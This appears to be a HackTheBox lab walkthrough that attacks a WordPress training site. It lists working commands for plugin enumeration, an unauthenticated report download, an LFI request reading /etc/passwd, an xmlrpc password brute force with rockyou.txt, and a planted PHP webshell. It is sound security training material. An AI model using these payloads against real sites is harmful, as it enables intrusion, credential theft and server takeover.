HackTheBox - Hacking WordPress - Skills Assessment Walkthrough

Scenario

You have been contracted to perform an external penetration test against the company INLANEFREIGHT that is hosting one of their main public-facing websites on WordPress.

Enumerate the target thoroughly using the skills learned in this module to find a variety of flags. Obtain shell access to the webserver to find the final flag.

Walkthrough

Target system 10.129.204.37

While navigating the website, we notice a 'Blog' button:

Let’s add it to /etc/hosts :

sudo sh -c 'echo "10.129.204.37 blog.inlanefreight.local " >> /etc/hosts'

And we're ready to start!

Q1 - Identify the WordPress version number.

Solution:

We can do this manually by reviewing the client’s source code, CSS, JavaScript, and readme.html. However, I will use the WPScan tool to quickly gather all the information about the WordPress web application and answer the next few questions:

wpscan --url http://blog.inlanefreight.local

The WordPress version of the web application has been found !

Q2 - Identify the WordPress theme in use.

Solution:

We can find this information in the scan we performed in the previous question:

The WordPress theme in use has been found !

Q3 - Submit the contents of the flag file in the directory with directory listing enabled.

Solution:;:

We can find this information in the scan we performed in the first question:

Let’s navigate to http://blog.inlanefreight.local/wp-content/uploads/:

And we can see upload_flag.txt file, let’s click it:

Flag found !

Q4 - Identify the only non-admin WordPress user. (Format: <first-name> <last-name>)

Solution:

Let's run enumeration on the WordPress web application:

wpscan --url http://blog.inlanefreight.local --enumerate

We can see the users found through this process:

A non-admin user has been found !

Q5 - Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

Solution:

During the initial scan in question 1, we identified the following vulnerable plugins due to their outdated versions:

We have identified three plugins that are not up to date:

• email-subscribers version 4.2.2

• site-editor version 1.1.1

• the-events-calendar version 5.1.2.1

The next step is to find a known vulnerability in one of these plugins that would allow us to download files without authentication.

After some Google searching, we found the following exploit:

https://www.exploit-db.com/exploits/48698

This exploit takes advantage of an old version of the email-subscribers plugin to download user reports without any authorization. Let’s use this exploit with curl by targeting the path specified:

curl 'http://blog.inlanefreight.local/wp-admin/admin.php?page=download_report&report=users&status=all'

The response is:

And the flag has been found !

Q6 - What is the version number of the plugin vulnerable to an LFI?

Solution:

We conducted another Google search for specific vulnerabilities affecting the following plugins:

email-subscribers version 4.2.2

site-editor version 1.1.1

the-events-calendar version 5.1.2.1

We specifically looked for Local File Inclusion (LFI) vulnerabilities. After the search, we found that:

We identified the specific plugin version vulnerable to the LFI vulnerability !

Q7 - Use the LFI to identify a system user whose name starts with the letter "f".

Solution:

We just need to use a known exploit for site-editor version 1.1.1 to exploit the LFI vulnerability.

You can find the exploit on Exploit-DB:

https://www.exploit-db.com/exploits/44340

Now, let’s use the PoC (Proof-of-Concept):

http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Then, enter the URL path in our web application:

http://blog.inlanefreight.local/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

User found !

Q8 - Obtain a shell on the system and submit the contents of the flag in the /home/erika directory.

Solution:

First, we need to find the credentials of an admin user:

wpscan --password-attack xmlrpc -t 20 -U erika,admin -P ./Desktop/rockyou.txt --url http://blog.inlanefreight.local

--password-attack xmlrpc - will perform a password attack against the xmlrpc file.

-t 20 - number of threads used,

-U erika,admin - list users to attack.

-P ./Desktop/rockyou.txt - use the rockyou.txt passwords file for the attack

We have obtained the username and password of an admin user.

Next, navigate to the WordPress login page at http://blog.inlanefreight.local/wp-admin and log in using Erika’s credentials:

Then, on the main page, go to Appearance and select Theme Editor:

Access an unused theme template (I used twentyseventeen) and insert the PHP webshell code into the 404 template file:

Finally, update the file.

Then, use curl to interact with the webshell.

First, run whoami to verify it’s working:

And it works !

Then, locate a file in /home/erika and output its content:

Flag successfully found ! 😁